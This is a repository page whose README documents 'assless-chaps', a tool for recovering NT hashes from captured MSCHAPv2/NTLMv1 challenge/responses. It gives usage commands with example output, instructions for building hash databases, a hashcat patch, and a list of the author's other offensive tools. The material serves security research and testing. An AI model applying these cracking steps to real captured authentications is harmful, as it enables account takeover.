• Stars
    star
    127
  • Rank 282,790 (Top 6 %)
  • Language
    Python
  • Created over 3 years ago
  • Updated 9 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Crack MSCHAPv2 challenge/responses quickly using a database of NT hashes

assless-chaps

Crack MSCHAPv2/NTLMv1 challenge/responses quickly using a database of NT hashes

Introduction

Assless CHAPs is an efficient way to recover the NT hash used in a MSCHAPv2/NTLMv1 exchange if you have the challenge and response (e.g. from a WiFi EAP WPE attack).

It requires a database of NT hashes, instructions on how to make these from existing lists or using hashcat with wordlists and rules are available below. I've included a sample database from SecLists. You'll need to bunzip it.

Technique

An MSCHAPv2 exchange does not require the clear-text password to be "cracked", rather we merely need the NThash used.

MSCHAPv2 splits the NThash into three parts, and uses each part as different keys to DES encrypt the same challenge (derived from the peer and authenticator challenges). The NTHash is split into two 7-byte keys, and one 2-byte key. This means the last key is padded with NULLs to make a key of the required length. This can be rapidly brute forced due to the efficiency of DES operation and a keyspace of 65 535. Once we have those two bytes, we can look up all NThashes in our database, that end in those two bytes. This provides a much smaller set of possible hashes to check.

This is a form of space vs time tradeoff, similar to a rainbow table. It's also a form of hash shucking.

Presentation

This was first presented at Defcon 29's RF Hacking Village. The slides are included in this repository.

Speed

Here is the comparison for three sample challenge/response's and three different wordlists, a small private one, rockyou, and the Have I Been Pwned list. These were done on my Macbook Pro 2016. Hashcat is using this hash schucking kernel and the two builtin GPUs and a pure rather than optimised kernel (as the latter doesn't exist yet). Hash3 isn't in the lists to simulate worst case performance. I'm not including the time hashcat takes to build the dictionary cache on first run.

Hash1

Small hashlist:

hashcat 0.50s user 0.27s system 55% cpu 1.405 total (8597.8 kH/s)
assless 0.05s user 0.00s system 294% cpu 0.018 total

Rockyou hashlist:

hashcat 2.67s user 0.51s system 93% cpu 3.413 total
assless 0.05s user 0.01s system 281% cpu 0.021 total

HIBP hashlist:

hashcat 59.97s user 11.72s system 136% cpu 52.603 total (5620.6 kH/s)
assless 0.05s user 0.00s system 292% cpu 0.018 total

Hash 2

Small hashlist:

hashcat 0.51s user 0.27s system 55% cpu 1.409 total (8704.7 kH/s)
assless 0.03s user 0.00s system 248% cpu 0.012 total

Rockyou hashlist:

hashcat 2.20s user 0.46s system 110% cpu 2.409 total (5798.4 kH/s)
assless 0.03s user 0.00s system 231% cpu 0.015 total

HIBP hashlist:

hashcat 65.37s user 12.74s system 135% cpu 57.712 total (5768.7 kH/s)
assless 0.03s user 0.00s system 249% cpu 0.013 total

Hash 3

Hash 3 doesn't exist in any of the hashlists to simulate a worst case lookup performance.

Small hashlist:

hashcat 0.67s user 0.34s system 66% cpu 1.526 total (7550.1 kH/s)
assless 0.02s user 0.00s system 211% cpu 0.012 total

Rockyou hashlist:

hashcat 2.71s user 0.52s system 94% cpu 3.415 total (5685.4 kH/s)
assless 0.02s user 0.01s system 181% cpu 0.014 total

HIBP hashlist:

hashcat 125.19s user 27.62s system 139% cpu 1:49.75 total (5634.9 kH/s)
assless 0.06s user 0.03s system 115% cpu 0.075 total

Installing

The rust version will require SQLite 3.6.8 or newer.

The python version requires python3, sqlite3 and pycryptodome.

The database creation utility requires python3 and the sqlite3 CLI.

Compiling

This only applies to the rust version. You'll need cargo.

With cargo installed, merely change to the assless-chaps-rs directory, and build it with: cargo build --release

The resulting binary will be in the target/release/ directory.

Usage

Assless requires the challenge, response and database of NThashes. Optionally, the python version can use the bundled optimised two byte lookup file. The simplest usage looks like this:

./assless-chaps <Challenge> <Response> <hashes.db>

For example:

./assless-chaps 5d79b2a85966d347 556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87 rockyou.db

The output should look like:

[-] Two byte lookup file not provided, will brute force instead.
[+] Found in 22636 tries: 586c
[-] Found 222 hashes ending in 586c
[+] Found hash: 8846f7eaee8fb1
[-] Found after 186 hashes.
[+] Found hash: 17ad06bdd830b7
[+] Full hash: 8846f7eaee8fb117ad06bdd830b7586c

The final full hash 8846f7eaee8fb117ad06bdd830b7586c is the NT hash for password.

Two bytes lookup - Python only

I spent some time building a list of all 65 535 possible two byte values sorted by most prevalent across a large corpus of passwords. This file is includes as twobytes. You can just pass it as the fourth argument to assless.

This typically saves a few rounds of DES, but doesn't make a large speed difference. It might if you're doing many hashes.

python3 assless-chaps.py 5d79b2a85966d347 556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87 rockyou.db twobytes

[+] Found in 65533 tries: 586c
[-] Found 222 hashes ending in 586c
[+] Found hash: 8846f7eaee8fb1
[-] Found after 186 hashes.
[+] Found hash: 17ad06bdd830b7
[+] Full hash: 8846f7eaee8fb117ad06bdd830b7586c

Creating your own hash dictionary

The mksqlitedb.py file will assist in turning a CSV hash file into the database.

python3 mksqlitedb.py <database name> <csv file>

The CSV file requires three columns:

  • The last two bytes of the hash (the last four ASCII characters)
  • The first 7 bytes (the first 14 ASCII characters)
  • The second 7 bytes (the 15-29th ASCII characters

For example, the hash 8846f7eaee8fb117ad06bdd830b7586c will become:

586c,8846f7eaee8fb1,17ad06bdd830b7

An example regexp transformation for this would be: echo 8846f7eaee8fb117ad06bdd830b7586c | sed "s/^\(.\{14\}\)\(.\{14\}\)\(.\{4\}\)$/\3,\1,\2/"

You can either take an existing list of hashes (such as the Have I Been Pwned lists or generate your own from hashcat and your favourite wordlist/rules combinations.

Using Have I Been Pwned

The HIBP password lists are already downloadable as NT Hashes, one just needs to remove the count from the file and convert them to CSV format to be imported into the database.

This can be done using the standard Unix utility sed like so:

sed "s/^\(.\{14\}\)\(.\{14\}\)\(.\{4\}\):.*/\3,\1,\2/ pwned-passwords-ntlm-ordered-by-hash.txt" > hibp.csv

After which it can be imported using mksqlitedb.py hibp.db hibp.csv.

Converting a wordlist to a hashlist

To convert a straight wordlist to a hashlist of nthashes, you can use nthasher which can do large wordlists fast. The resulting hashes will need to be turned into the required CSV format as described above.

A much slower nthasher that will output the hashes direct to the required CSV format is included in this repository, and is quite simply run with:

python3 nthash-from-clear.py <wordlist> > hashlist.csv

If you want to expand the wordlist with rules see the next section on using hashcat.

Using hashcat to create a hash csv file from wordlists and rules

You'll need to make a small code change to the mode 1000 OpenCL module to make it spit out every hash, rather than only those matching your crack candidate. By default, it will generate the hash in the right CSV format required.

  • Change to your hashcat OpenCL directory: cd hashcat/OpenCL
  • Apply the patch: patch < m01000_a0-pure.cl.patch
  • Prepare a file with an impossible to crack NT hash like echo 11111111111111111111111111111111 > impossible_hash
  • Crack as normal, but disable your potfile and redirect the output to a file: hashcat -m1000 impossible_hash rockyou.txt -r best64.rule --potfile-disable --quiet > rockyou.csv
  • Create your hashes database: python3 mksqlitedb.py rockyou.db rockyou.csv

A note on disk space and file sizes

The SQLite database is typically 61% larger that the CSV file used to create it. It can also take some time to create the database depending on the size of files. Prepare your filesystem requirements accordingly.

Here is an example using the rockyou dictionary:

  • Base rockyou dictionary 129M
  • hashcat generated rockyou.csv 462M
  • Resulting SQLite database rockyou.db 746M
  • BZip2 maximum compression rockyou.db.bz2 339M

You could save space by converting and inserting each hash dynamically and skipping the need for the intermediary CSV file.

NTLMv1 SSP

NTLMv1 will work in exactly the same way, unless it's using SSP. You'll know if SSP is in use if you get an LM response that ends in a bunch of zeros. You can use the included ntlm-ssp.py to produce the server challenge that assless will need.

Run it like this: python3 ntlm-ssp.py <lm response> <challenge>

For example if we use the example NTLMv1-SSP challenge response from the hashcat example hashes: u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

You would pass in the LM and challenge like so:

python3 ntlm-ssp.py 338d08f8e26de93300000000000000000000000000000000 cb8086049ec4736c

And get the following response:

The server challenge is: 724edf24aea0d68b

Which can then be cracked with assless-chaps like normal:

./assless-chaps 724edf24aea0d68b 9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41 hashes.db

More Repositories

1

objection

πŸ“± objection - runtime mobile exploration
Python
7,492
star
2

gowitness

πŸ” gowitness - a golang, web screenshot utility using Chrome Headless
Go
3,159
star
3

reGeorg

The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Python
3,015
star
4

ruler

A tool to abuse Exchange services
Go
2,164
star
5

mana

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM
HTML
1,087
star
6

DET

(extensible) Data Exfiltration Toolkit (DET)
Python
819
star
7

godoh

πŸ•³ godoh - A DNS-over-HTTPS C2
Go
752
star
8

kwetza

Python script to inject existing Android applications with a Meterpreter payload.
Smali
638
star
9

Snoopy

Snoopy: A distributed tracking and data interception framework
Python
597
star
10

hostapd-mana

SensePost's modified hostapd for wifi attacks.
C
543
star
11

rattler

Automated DLL Enumerator
C++
522
star
12

DNS-Shell

DNS-Shell is an interactive Shell over DNS channel
Python
521
star
13

USaBUSe

Universal Serial aBUSe is a project to demonstrate the risks of hardware bypasses of software security by Rogan Dawes at SensePost.
C
493
star
14

snoopy-ng

Snoopy v2.0 - modular digital terrestrial tracking framework
Python
430
star
15

reDuh

Create a TCP circuit through validly formed HTTP requests
Java
343
star
16

Frack

Frack - Keep and Maintain your breach data
Python
309
star
17

autoDANE

Auto Domain Admin and Network Exploitation.
Python
295
star
18

impersonate

A windows token impersonation tool
Python
279
star
19

SPartan

Frontpage and Sharepoint fingerprinting and attack tool.
Python
277
star
20

wiresocks

A sock, with a wire, so you can tunnel all you desire.
Shell
272
star
21

mallet

Mallet is an intercepting proxy for arbitrary protocols
Java
262
star
22

UserEnum

Domain user enumeration tool
Python
212
star
23

jack

Drag and Drop ClickJacking PoC development assistance tool.
CSS
190
star
24

wpa_sycophant

Evil client portion of EAP relay attack
C
189
star
25

wikto

Nikto for Windows with some extra features.
C#
175
star
26

routopsy

Routopsy - Hacking Routers with Routers
Python
167
star
27

heartbleed-poc

Test for SSL heartbeat vulnerability (CVE-2014-0160)
Ruby
159
star
28

dwn

d(ockerp)wn - a docker pwn tool manager
Python
156
star
29

gdi-palettes-exp

DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects
C++
143
star
30

wadi

Wadi Fuzzing Harness
JavaScript
127
star
31

birp

Big Iron Recon & Pwnage
Python
123
star
32

go-out

β˜„οΈ go-out - A Golang egress buster.
Go
122
star
33

mail-in-the-middle

Python
100
star
34

mydumbedr

C
99
star
35

liniaal

Liniaal - A communication extension to Ruler
Go
96
star
36

frida-windows-playground

A collection of Frida hooks for experimentation on Windows platforms.
C
95
star
37

ms16-098

Windows 8.1 x64 Exploit for MS16-098 RNGOBJ_Integer_Overflow
C
92
star
38

notruler

The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
Go
91
star
39

offensive-rpc

Offensive RPC PoC
C++
83
star
40

anapickle

Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.
Python
79
star
41

autoresponder

Quick python script to automatically load NTLM hashes from Responder logs and fires up Hashcat to crack them
Python
78
star
42

xrdp

A rudimentary remote desktop tool for the X11 protocol exploiting unauthenticated x11 sessions
Python
76
star
43

apostille

Java
72
star
44

peanuts

Peanuts is a free and open source wifi tracking tool. Based on the SensePosts Snoopy-NG project that is now closed.
Python
69
star
45

WiFi-Rifle

Creating a wireless rifle de-authentication gun, which utilized a yagi antenna and a Raspberry Pi.
Python
68
star
46

punch-q

πŸ‘Š A small utility to play with IBM MQ
Python
61
star
47

hash-cracker

Script to perform some hashcracking logic automagically
C
61
star
48

common-substr

Simple tool to extract the most common substrings from an input text. Built for password cracking.
Go
61
star
49

shinai-fi

Docker images for learning wifi hacking
Shell
60
star
50

thumbscr-ews

Exchangelib wrapper for pentesting
Python
56
star
51

wsproxy

A websocket proxy
JavaScript
55
star
52

BiLE-suite

The Bi-directional Link Extractor.
Perl
53
star
53

go-derper

Memcache hacking tool.
Ruby
47
star
54

yeti

SensePost's network footprinting and enumeration tool. You can't pwn what you don't know about.
Java
43
star
55

understanding-eap

A repository with toy implementations of MSCHAPv2, MPEE and WPA/2 to understand EAP better
Python
37
star
56

sockstlsproxy

C#
37
star
57

ntcrack

Left To My Own Devices - NT hash tools
Rust
31
star
58

dual-pod-shock

C
27
star
59

policies

Collection of information security policies.
27
star
60

Suru

Suru is one of the original Man In The Middle (MITM) proxies that sits between the user's browser and the web application.
C#
26
star
61

steampipe-plugin-projectdiscovery

A steampipe plugin to query projectdiscovery.io tools.
Go
26
star
62

squeeza

SQL Injection without the pain of syringes.
Ruby
24
star
63

x11-active-displays

Checks X11 and outputs a screenshot to of the display if allowed and the display is active
Lua
22
star
64

wpa3-vuln

hostapd and wpa_supplicant 2.7 vulnerable to Mathy's WPA3 bugs
C
21
star
65

SapCap

SApCap is a SAP packet sniffer and decompression tool for analysing SAP GUI (DIAG) traffic
C++
16
star
66

6thSense

A while back antirez, in a post to Bugtraq, detailed a new Tcp portscan method.
Perl
16
star
67

maltego-mvs

Tools to combine MVS data with external sources and visualise the output in Maltego.
Python
16
star
68

password-tools

Service desk password tools.
JavaScript
15
star
69

cipherchecks

visually see issues with supported cipher suites
Python
15
star
70

ntp_monlist

Basic script to pull addresses from a NTP server using the monlist command.
Python
14
star
71

XAPSpy

Runtime analysis of windows phone 7 applications.
C#
13
star
72

esp-vnc

Our fork of the esp-link firmware with a built in VNC server for passing input events to an AVR. Part of our Universal Serial aBUSe project.
C
11
star
73

casper

Casper is a tiny system tray application that can be used to view the invisible windows on your desktop.
C#
11
star
74

SAPProx

SAPProx is a proof of concept tool for intercepting and modifying SAP GUI (DIAG protocol) traffic.
C++
11
star
75

JBaah

HTTP Brute Forcer (Java replacement for SP's CrowBar).
Java
11
star
76

SP-DNS-mine

Google DNS name / sub domain miner.
Perl
10
star
77

SpUD

SensePost Unified Data API (SPUD) is a wrapper for apps requiring use of the deprecated Google API.
C#
10
star
78

neverevercookie

GUI for cleaning out evercookie persistence locations.
Java
10
star
79

dresscode

Python
10
star
80

berate_radius

Alpine hostapd-mana based RADIUS server
Shell
9
star
81

Manifestor

Android Manifest.xml tool
Python
9
star
82

ClashofSpamTitan

Python
9
star
83

BilePublic

BiLE stands for Bi-directional Link Extraction. It is used in the footprinting process to find non-obvious relationships between different web sites.
Perl
9
star
84

glypeahead

Port scan through Glype proxies.
PHP
8
star
85

finder

Finder.pl remotely checks IIS Servers for most of the methods used by WebDAV.
Perl
8
star
86

jcertchecker

JCertChecker is used to check HTTPS certificates.
Java
7
star
87

desperate

Perl
7
star
88

MonSoen

Proxy Server network scanner and tunnelling tool.
Python
7
star
89

Scully

Scully is a client interface to MSSQL and MySQL database servers.
C#
7
star
90

hash-cracker-apple-silicon

Script to perform some hashcracking logic automagically
Python
6
star
91

sconwar

a bring your own client programming game
Go
6
star
92

CarbanakCheck

Check squid logs for possible Carbanak malware.
Python
6
star
93

go

Seriously primitive portscanner using Squid proxy.
Perl
6
star
94

pudding

IDS evasion for web-based exploits via encoding built into a "proxy"
5
star
95

gr-protocoldecoder

A simple way to decode a known protocol in GRC in real time.
CMake
4
star
96

mpdchecker

Confirm the presence of HTTP methods per directory.
Python
4
star
97

unitools

For working with IIS servers with the Unicode bug
Perl
4
star
98

file-read-experiments

A few short scripts to look at the performance of various file read strategies.
Rust
4
star
99

ctf-challenges

A collection of CTF challenges
CSS
3
star
100

sensedecode

Sensedecode includes 2 perl scripts which exploit the IIS url decoding bug.
Perl
3
star